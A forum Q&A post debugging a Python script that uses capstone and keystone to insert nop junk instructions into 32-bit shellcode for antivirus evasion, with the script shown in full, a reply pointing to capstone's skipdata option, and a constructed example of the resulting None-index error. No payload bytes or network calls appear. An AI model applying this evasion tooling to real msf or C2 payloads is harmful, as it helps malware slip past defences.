
Asking about a Python script for encrypting shellcode

2020-08-14 20:42
I'd like to ask why, when run with the shellcode the original author included, it executes without errors, but with shellcode I generate myself with msf or a C2 it throws an error.
I asked a Python expert and he said the code is fine; the problem is in the data.
I've often seen this while reading AV-evasion articles. Did I get something wrong? Has anyone run into this situation?
The error says list indices must be integers, not NoneType:
asmarray[revision_unique[i]]="a"+str(revision_unique[i])+": "+asmarray[revision_unique[i]]

TypeError: list indices must be integers, not NoneType
I printed the parameter from the error and found that one of the values in it is None. How should this be resolved?

Script link: https://github.com/sayhi2urmom/shellcodeseperator/blob/master/main.py
from capstone import *
from keystone import *


def assemble(code):
    # Assemble the rewritten instruction stream back into bytes (x86, 32-bit).
    try:
        ks = Ks(KS_ARCH_X86, KS_MODE_32)
        encoding, count = ks.asm(code)
        return [hex(i) for i in encoding]
    except KsError as e:
        print(e)
        return -1


def byteoffset2index(offset):
    # Walk the disassembly and return the index of the instruction that starts
    # at `offset`. If no instruction starts there (offset is mid-instruction, or
    # capstone stopped decoding before reaching it), the function returns None.
    temp = offset
    a = 0
    for i in md.disasm(CODE, 0x0):
        temp -= len(i.bytes)
        a += 1
        if temp == 0:
            return a


if __name__ == "__main__":
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    controlflow = ["jmp", "jz", "jnz", "je", "jne", "call", "jl", "ja", "loop", "jecxz", "jle", "jge", "jg", "jp", "jnl"]
    registers = ["eax", "ebx", "edx", "ebp", "esp", "edi", "esi"]
    CODE = b"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"

    # Disassemble into one "mnemonic operands" string per instruction.
    asm = ";".join([i.mnemonic + " " + i.op_str for i in md.disasm(CODE, 0x0)])
    asmarray = asm.split(";")
    length = len(asmarray)

    # Indices of control-flow instructions.
    tags = []
    for i in range(0, len(asmarray)):
        for mnemonic in controlflow:
            if (mnemonic in asmarray[i]):
                tags.append(i)

    # Drop register-indirect branches; only immediate targets are rewritten.
    mask = []
    for i in range(0, len(tags)):
        for reg in registers:
            if (reg in asmarray[tags[i]]):
                mask.append(tags[i])
    [tags.remove(i) for i in mask]
    tagins = [asmarray[i] for i in tags]

    # Map each immediate branch target (byte offset) to an instruction index.
    revision = []
    for i in range(0, len(tagins)):
        b = tagins[i][tagins[i].index("0x"):]
        n = byteoffset2index(int(b, 16))
        revision.append(n)
    revision_unique = list(set(revision))

    # Label each target instruction and point the branches at the labels.
    for i in range(0, len(revision_unique)):
        asmarray[revision_unique[i]] = "a" + str(revision_unique[i]) + ": " + asmarray[revision_unique[i]]
    tagins = [asmarray[i] for i in tags]
    for i in range(0, len(tags)):
        asmarray[tags[i]] = tagins[i][:tagins[i].index("0x")] + "a" + str(revision[i])

    obfuscation = "nop"
    code = obfuscation + ";" + (";" + obfuscation + ";").join(asmarray)
    print("unsigned char buf[]=" + str(assemble(code)).replace("'", "").replace("[", "{").replace("]", "}") + ";")
    print("unsigned char buf[]=" + str(assemble(code)[::-1]).replace("'", "").replace("[", "{").replace("]", "}") + ";")





Answer:

This is a Python script that uses capstone and keystone to insert junk instructions. When he calls the functions here he doesn't set the cs_opt_skipdata parameter; you can add it yourself. Drag the shellcode that CS generates by default into IDA and take a look: you'll find that the disassembly contains a data region. When capstone reaches the data region while parsing and finds that those instructions don't exist, it simply stops.
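The answer's point, illustrated as an added example (not the poster's script and independent of capstone): a linear sweep stops at the first byte it cannot decode, so a branch target past that point has no instruction to map to and the lookup yields None. The instruction tables, offsets and the ".byte" pseudo-instructions below are constructed to mirror what the disassembler returns with and without skipdata.

```python
# Added example: why byteoffset2index() can return None, and how to report it
# instead of crashing with "list indices must be integers, not NoneType".

def offset_to_index(insns, offset):
    """Map a byte offset to the index of the instruction starting there.

    insns: list of (start_offset, size, mnemonic) from one disassembly pass.
    Returns None when no instruction starts at `offset`, i.e. the offset is
    mid-instruction or lies past the point where decoding stopped.
    """
    for idx, (start, _size, _mnemonic) in enumerate(insns):
        if start == offset:
            return idx
    return None


def classify_targets(insns, targets):
    """Classify each branch target so a caller can diagnose unresolved ones."""
    end = insns[-1][0] + insns[-1][1] if insns else 0  # first undecoded byte
    result = {}
    for target in targets:
        idx = offset_to_index(insns, target)
        if idx is not None:
            result[target] = ("ok", idx)
        elif target >= end:
            result[target] = ("past_decoded_region", None)  # the page's case
        else:
            result[target] = ("mid_instruction", None)
    return result


# Constructed disassembly: four instructions, then undecodable data at 0x0a.
# Without skipdata the sweep ends there, and the jmp's target 0x10 is beyond it.
WITHOUT_SKIPDATA = [
    (0x00, 2, "xor"),
    (0x02, 5, "mov"),
    (0x07, 1, "push"),
    (0x08, 2, "jmp"),   # jmp 0x10
]

# Same bytes with skipdata enabled: the six data bytes 0x0a..0x0f come back as
# one-byte ".byte" pseudo-instructions (x86 default), so decoding reaches 0x10.
WITH_SKIPDATA = WITHOUT_SKIPDATA + [(0x0a + k, 1, ".byte") for k in range(6)] + [
    (0x10, 5, "call"),
]

TARGETS = [0x02, 0x09, 0x10]  # constructed: valid, mid-instruction, past data

if __name__ == "__main__":
    print(classify_targets(WITHOUT_SKIPDATA, TARGETS))
    print(classify_targets(WITH_SKIPDATA, TARGETS))
```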


Source: https://www.t00ls.net/articles-57467.html

Views: 37248 | Comments: 0 | Tags: encryption shellcode shell
